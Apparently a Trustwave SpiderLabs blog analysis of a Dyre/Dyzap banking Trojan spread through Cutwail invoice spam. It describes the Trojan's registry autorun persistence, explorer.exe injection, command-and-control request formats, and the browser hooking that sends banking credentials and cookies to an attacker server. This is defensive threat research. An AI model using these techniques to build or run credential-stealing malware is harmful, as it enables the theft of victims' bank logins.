Trustwave Unveils New Offerings to Maximize Value of Microsoft Security Investments. Learn More

Trustwave Unveils New Offerings to Maximize Value of Microsoft Security Investments. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Analysis of a New Banking Trojan Spammed by Cutwail

The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail's portfolio is to use links pointing to popular file hosting services. Over the past weeks, we have observed spam that claims to be an unpaid invoice from a certain bank.

Influx of Invoice Spam Campaign detected by Trustwave Secure Email Gateway

Currently, one of the most common themes in malicious spam campaigns are around claims of an invoice or product order with either ZIP file attachments or links to a ZIP/RAR file hosted on the web. This high volume campaign contains links to the file sharing services, Dropbox and Cubby. The files hosted are ZIP files with filenames such as invoice_<digit>.zip and document_<digit>.zip.


Malware Payload

After downloading and extracting the malware, we noticed that it uses an Adobe PDF icon to trick users into believing it is a harmless portable document file. When run, the executable file drops a copy of itself in to the Windows %AppData% (application data) directory as googleupdaterr.exe. It then creates an autorun registry to execute itself at Windows startup:

HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\RunGoogleUpdate = "%AppData%\googleupdaterr.exe"

A code stored in the malware's body is then injected to Explorer.exe. It also creates an infection marker in the Explorer.exe process by creating a Mutex named "RangisMutex5"


Antivirus companies have dubbed the loader of this new banking Trojan "Dyranges or Trojan Dyzap," and so has the DLL code injected to explorer.exe. A detection name perhaps taken from a PDB path found in the malware body:

The malware PDB path of a project named DYRE. Interesting fact "zapuskator2.pdb" is a Russian translation of "executer2.pdb"

A configuration file named userdata.dat is then dropped in the %AppData% directory containing the BotID, encrypted configuration and a Boolean variable named "AUTOBACKCONN". We assume that setting AUTOBACKCONN to True enables the persistent connection of the bot to its command and control server.


Right after the malware installation, the Trojan sends the following GET request to its command and control server with the IP address Here's the sequence communication with the server:

  1. The first GET request is the "publickey" request using the format "/cho1017/<botid>/5/publickey/".
  2. The bot then reports the OS version of the infected system to its C&C server using the format "/cho1017/<botid>/0/<Windows Version>/".
  3. Then an unknown GET request "/58/1/ ", after which the C&C server replies back with the ThreadID.


After the initial server handshake, The trojan tries to maintain the connectivity to its server through an ongoing GET request using the format:

GET /cho1017/<botid>/1/<base64 data>/HTTP/1.1User-Agent: Wget/1.9Host:


This banking Trojan hooks Google Chrome, Firefox or Internet Explorer browsers. This browser hooking function enables the Trojan to intercept user searches, browser cookies and sensitive banking information.


The Trojan then monitors a list of banking websites. When a victim visits a banking website being monitored, the information entered by the victim is intercepted and sent to the cybercriminal's server. The snippet of code below is the function where the Trojan monitors various banking URLs and where the intercepted data is sent to a remote IP address at port 12081.


The packet capture below shows the POST request intercepted by the Trojan right after log-in to a monitored banking website. The POST data which includes the login credentials and cookies are sent to the cybercriminal's server.


Acting as a man-in-the-middle, the Trojan sends the intercepted POST data to the cybercriminal's IP address. But the data is also sent through the normal SSL encrypted tunnel between the victim's browser and the bank's web server which hides the suspicious activity going on in the background.


As of this writing, the offending IP address is offline. We are not sure if it was taken down or the cybercriminal moved to a different server. But according to our intelligence, the attacker's IP address was linked to an underground drop ship service Global Blackpoint, a service popular for carders (and other scammers). It also hosts various phishing pages targeting banking institutions.

Global Blackpoint Login Panel

To wrap up, we always advise users to be wary when clicking links in emails. Extra scrutiny should be placed on links to common file sharing websites such as Dropbox and Cubby, especially now that cybercriminals have started to utilize them for hosting their malware. Trustwave Secure Email Gateway users are protected from this malicious spam campaign.

Latest SpiderLabs Blogs

Search & Spoof: Abuse of Windows Search to Redirect to Malware

Trustwave SpiderLabs has detected a sophisticated malware campaign that leverages the Windows search functionality embedded in HTML code to deploy malware. We found the threat actors utilizing a...

Read More

The Sentinel’s Watch: Building a Security Reporting Framework

Imagine being on shift as the guard of a fortress. Your job is to identify threats as they approach the perimeter. The more methods you have for detecting those threats, the better your chances of...

Read More

Fake Advanced IP Scanner Installer Delivers Dangerous CobaltStrike Backdoor

During a recent client investigation, Trustwave SpiderLabs found a malicious version of the Advanced IP Scanner installer, which contained a backdoored DLL module. Our client had been searching for...

Read More